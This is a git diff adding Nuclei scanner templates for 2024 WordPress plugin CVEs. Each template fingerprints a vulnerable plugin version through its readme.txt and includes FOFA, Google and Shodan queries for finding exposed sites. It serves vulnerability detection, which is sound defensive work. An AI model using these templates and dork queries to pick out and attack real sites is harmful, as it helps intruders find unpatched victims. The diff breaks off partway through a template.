tags: cve,wordpress,wp-plugin,wp-backitup,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-backitup/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-backitup" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.50') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43269.yaml b/poc/cve/CVE-2024-43269.yaml new file mode 100644 index 0000000000..b87002af16 --- /dev/null +++ b/poc/cve/CVE-2024-43269.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43269 + +info: + name: > + Backup and Restore WordPress <= 1.50 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The Backup and Restore WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.50. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/fa15939c-44eb-45e5-95d7-49307912f21c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43269 + metadata: + fofa-query: "wp-content/plugins/wp-backitup/" + google-query: inurl:"/wp-content/plugins/wp-backitup/" + shodan-query: 'vuln:CVE-2024-43269' + tags: cve,wordpress,wp-plugin,wp-backitup,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-backitup/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-backitup" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.50') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43270.yaml b/poc/cve/CVE-2024-43270.yaml new file mode 100644 index 0000000000..96c1ccd80e --- /dev/null +++ b/poc/cve/CVE-2024-43270.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43270 + +info: + name: > + Backup and Restore WordPress <= 1.50 - Missing Authorization + author: topscoder + severity: high + description: > + The Backup and Restore WordPress – Backup Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.50. This makes it possible for unauthenticated attackers to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8f35838f-4a7d-4d25-9e5e-956411e59b62?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43270 + metadata: + fofa-query: "wp-content/plugins/wp-backitup/" + google-query: inurl:"/wp-content/plugins/wp-backitup/" + shodan-query: 'vuln:CVE-2024-43270' + tags: cve,wordpress,wp-plugin,wp-backitup,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-backitup/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-backitup" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.50') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43271.yaml b/poc/cve/CVE-2024-43271.yaml new file mode 100644 index 0000000000..6545b8690d --- /dev/null +++ b/poc/cve/CVE-2024-43271.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43271 + +info: + name: > + Woo Products Widgets For Elementor <= 2.0.0 - Authenticated (Contributor+) Local File Inclusion + author: topscoder + severity: low + description: > + The Widgets for WooCommerce Products on Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.0.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e8336c89-44ac-4e41-bc81-7dae9599c050?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-43271 + metadata: + fofa-query: "wp-content/plugins/woo-products-widgets-for-elementor/" + google-query: inurl:"/wp-content/plugins/woo-products-widgets-for-elementor/" + shodan-query: 'vuln:CVE-2024-43271' + tags: cve,wordpress,wp-plugin,woo-products-widgets-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-products-widgets-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-products-widgets-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43272.yaml b/poc/cve/CVE-2024-43272.yaml new file mode 100644 index 0000000000..4656bf26c5 --- /dev/null +++ b/poc/cve/CVE-2024-43272.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43272 + +info: + name: > + Icegram <= 3.1.24 - Missing Authorization + author: topscoder + severity: high + description: > + The Icegram plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the display_messages() function in versions up to, and including, 3.1.24. This makes it possible for unauthenticated attackers to preview campaigns + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/990d62fd-dc55-446e-b3ff-52c7c121aeb8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43272 + metadata: + fofa-query: "wp-content/plugins/icegram/" + google-query: inurl:"/wp-content/plugins/icegram/" + shodan-query: 'vuln:CVE-2024-43272' + tags: cve,wordpress,wp-plugin,icegram,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/icegram/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "icegram" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1.24') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43273.yaml b/poc/cve/CVE-2024-43273.yaml new file mode 100644 index 0000000000..117b554981 --- /dev/null +++ b/poc/cve/CVE-2024-43273.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43273 + +info: + name: > + Icegram Collect – Easy Form, Lead Collection and Subscription plugin <= 1.3.14 - Missing Authorization + author: topscoder + severity: low + description: > + The Icegram Collect – Easy Form, Lead Collection and Subscription plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the disconnect_campaignmonitor() function, along with a few others, in versions up to, and including, 1.3.14. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify plugin settings. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/821e763a-fe84-4471-99d0-515e036122c0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43273 + metadata: + fofa-query: "wp-content/plugins/icegram-rainmaker/" + google-query: inurl:"/wp-content/plugins/icegram-rainmaker/" + shodan-query: 'vuln:CVE-2024-43273' + tags: cve,wordpress,wp-plugin,icegram-rainmaker,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/icegram-rainmaker/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "icegram-rainmaker" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.14') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43276.yaml b/poc/cve/CVE-2024-43276.yaml new file mode 100644 index 0000000000..db257083d4 --- /dev/null +++ b/poc/cve/CVE-2024-43276.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43276 + +info: + name: > + Child Theme Creator <= 1.5.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Child Theme Creator by Orbisius plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 1.5.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f25f358b-f9b7-4660-8dda-673023dc1967?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43276 + metadata: + fofa-query: "wp-content/plugins/orbisius-child-theme-creator/" + google-query: inurl:"/wp-content/plugins/orbisius-child-theme-creator/" + shodan-query: 'vuln:CVE-2024-43276' + tags: cve,wordpress,wp-plugin,orbisius-child-theme-creator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/orbisius-child-theme-creator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "orbisius-child-theme-creator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43278.yaml b/poc/cve/CVE-2024-43278.yaml new file mode 100644 index 0000000000..65d623a445 --- /dev/null +++ b/poc/cve/CVE-2024-43278.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43278 + +info: + name: > + Meta Field Block <= 1.2.13 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Meta Field Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.2.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/faee30bb-ba6e-4d3e-8ca1-79fd676e68f5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43278 + metadata: + fofa-query: "wp-content/plugins/display-a-meta-field-as-block/" + google-query: inurl:"/wp-content/plugins/display-a-meta-field-as-block/" + shodan-query: 'vuln:CVE-2024-43278' + tags: cve,wordpress,wp-plugin,display-a-meta-field-as-block,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/display-a-meta-field-as-block/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "display-a-meta-field-as-block" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.13') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43279.yaml b/poc/cve/CVE-2024-43279.yaml new file mode 100644 index 0000000000..2bfbb7b4d4 --- /dev/null +++ b/poc/cve/CVE-2024-43279.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43279 + +info: + name: > + Newsletters <= 4.9.8 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Newsletters plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 4.9.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/64de1220-52f5-46a9-b8ba-cf808d5d2e29?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43279 + metadata: + fofa-query: "wp-content/plugins/newsletters-lite/" + google-query: inurl:"/wp-content/plugins/newsletters-lite/" + shodan-query: 'vuln:CVE-2024-43279' + tags: cve,wordpress,wp-plugin,newsletters-lite,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/newsletters-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "newsletters-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.9.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43280.yaml b/poc/cve/CVE-2024-43280.yaml new file mode 100644 index 0000000000..5efc1ae278 --- /dev/null +++ b/poc/cve/CVE-2024-43280.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43280 + +info: + name: > + Salon booking system <= 10.8.1 - Unauthenticated Open Redirect + author: topscoder + severity: medium + description: > + The Salon Booking System plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 10.8.1. This is due to insufficient validation on the redirect url supplied. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b8e64950-4f01-4391-8c65-2f25ff5bcc06?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43280 + metadata: + fofa-query: "wp-content/plugins/salon-booking-system/" + google-query: inurl:"/wp-content/plugins/salon-booking-system/" + shodan-query: 'vuln:CVE-2024-43280' + tags: cve,wordpress,wp-plugin,salon-booking-system,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/salon-booking-system/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "salon-booking-system" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 10.8.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43281.yaml b/poc/cve/CVE-2024-43281.yaml new file mode 100644 index 0000000000..18bb69cd1e --- /dev/null +++ b/poc/cve/CVE-2024-43281.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43281 + +info: + name: > + Void Elementor Post Grid Addon for Elementor Page builder <= 2.3 - Authenticated (Contributor+) Local File Inclusion + author: topscoder + severity: low + description: > + The Void Elementor Post Grid Addon for Elementor Page builder plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.3 via the 'display_type' attribute. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/15178478-5208-4869-a9f0-07e8e11ef0d5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-43281 + metadata: + fofa-query: "wp-content/plugins/void-elementor-post-grid-addon-for-elementor-page-builder/" + google-query: inurl:"/wp-content/plugins/void-elementor-post-grid-addon-for-elementor-page-builder/" + shodan-query: 'vuln:CVE-2024-43281' + tags: cve,wordpress,wp-plugin,void-elementor-post-grid-addon-for-elementor-page-builder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/void-elementor-post-grid-addon-for-elementor-page-builder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "void-elementor-post-grid-addon-for-elementor-page-builder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43282.yaml b/poc/cve/CVE-2024-43282.yaml new file mode 100644 index 0000000000..d0f98f81a8 --- /dev/null +++ b/poc/cve/CVE-2024-43282.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43282 + +info: + name: > + Tutor LMS <= 2.7.2 - Authenticated (Administrator+) SQL Injection + author: topscoder + severity: low + description: > + The Tutor LMS plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/839b68e6-0462-4f88-ac13-ed4b69887d6b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2024-43282 + metadata: + fofa-query: "wp-content/plugins/tutor/" + google-query: inurl:"/wp-content/plugins/tutor/" + shodan-query: 'vuln:CVE-2024-43282' + tags: cve,wordpress,wp-plugin,tutor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tutor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tutor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43283.yaml b/poc/cve/CVE-2024-43283.yaml new file mode 100644 index 0000000000..a9c326777e --- /dev/null +++ b/poc/cve/CVE-2024-43283.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43283 + +info: + name: > + Contest Gallery <= 23.1.2 - Unauthenticated Information Exposure + author: topscoder + severity: medium + description: > + The Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 23.1.2. This makes it possible for unauthenticated attackers to extract data like comment user IDs and IP Addresses. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f5e400f8-35b4-4be4-bb00-c59e14ddd57f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43283 + metadata: + fofa-query: "wp-content/plugins/contest-gallery/" + google-query: inurl:"/wp-content/plugins/contest-gallery/" + shodan-query: 'vuln:CVE-2024-43283' + tags: cve,wordpress,wp-plugin,contest-gallery,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/contest-gallery/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "contest-gallery" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 23.1.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43284.yaml b/poc/cve/CVE-2024-43284.yaml new file mode 100644 index 0000000000..41cc057d93 --- /dev/null +++ b/poc/cve/CVE-2024-43284.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43284 + +info: + name: > + WP Travel Gutenberg Blocks <= 3.5.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The WP Travel Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.5.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/55fd9ca6-fe57-490d-bfde-492957035311?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43284 + metadata: + fofa-query: "wp-content/plugins/wp-travel-blocks/" + google-query: inurl:"/wp-content/plugins/wp-travel-blocks/" + shodan-query: 'vuln:CVE-2024-43284' + tags: cve,wordpress,wp-plugin,wp-travel-blocks,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-travel-blocks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-travel-blocks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.5.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43288.yaml b/poc/cve/CVE-2024-43288.yaml new file mode 100644 index 0000000000..6a90551bc8 --- /dev/null +++ b/poc/cve/CVE-2024-43288.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43288 + +info: + name: > + wpForo Forum <= 2.3.4 - Authenticated (Subscriber+) Insecure Direct Object Reference + author: topscoder + severity: low + description: > + The wpForo Forum plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.3.4 due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9cac5c66-d366-4a67-b29b-4efed67ab55b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43288 + metadata: + fofa-query: "wp-content/plugins/wpforo/" + google-query: inurl:"/wp-content/plugins/wpforo/" + shodan-query: 'vuln:CVE-2024-43288' + tags: cve,wordpress,wp-plugin,wpforo,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpforo/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpforo" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43289.yaml b/poc/cve/CVE-2024-43289.yaml new file mode 100644 index 0000000000..fa9f6052ee --- /dev/null +++ b/poc/cve/CVE-2024-43289.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43289 + +info: + name: > + wpForo Forum <= 2.3.4 - Unauthenticated Sensitive Information Exposure + author: topscoder + severity: medium + description: > + The wpForo Forum plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.3.4. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/99650c4d-d8ef-4970-af65-b22b7fdf3543?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43289 + metadata: + fofa-query: "wp-content/plugins/wpforo/" + google-query: inurl:"/wp-content/plugins/wpforo/" + shodan-query: 'vuln:CVE-2024-43289' + tags: cve,wordpress,wp-plugin,wpforo,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpforo/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpforo" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43292.yaml b/poc/cve/CVE-2024-43292.yaml new file mode 100644 index 0000000000..841ba8c4e9 --- /dev/null +++ b/poc/cve/CVE-2024-43292.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43292 + +info: + name: > + Envo's Elementor Templates & Widgets for WooCommerce <= 1.4.16 - Authenticated (Author+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Envo's Elementor Templates & Widgets for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.4.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7abb5103-7063-4a8d-8ca0-66074954acd5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43292 + metadata: + fofa-query: "wp-content/plugins/envo-elementor-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/envo-elementor-for-woocommerce/" + shodan-query: 'vuln:CVE-2024-43292' + tags: cve,wordpress,wp-plugin,envo-elementor-for-woocommerce,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/envo-elementor-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "envo-elementor-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.16') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43296.yaml b/poc/cve/CVE-2024-43296.yaml new file mode 100644 index 0000000000..b3092a87f7 --- /dev/null +++ b/poc/cve/CVE-2024-43296.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43296 + +info: + name: > + Flash & HTML5 Video <= 2.5.30 - Missing Authorization + author: topscoder + severity: low + description: > + The Flash & HTML5 Video plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several AJAX actions in versions up to, and including, 2.5.30. This makes it possible for authenticated attackers, with subscriber-level access and above, to update views, create thumbnails, and more. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/84ce21b9-91ac-4990-8665-69a1461147ab?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43296 + metadata: + fofa-query: "wp-content/plugins/html5-video-player/" + google-query: inurl:"/wp-content/plugins/html5-video-player/" + shodan-query: 'vuln:CVE-2024-43296' + tags: cve,wordpress,wp-plugin,html5-video-player,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - 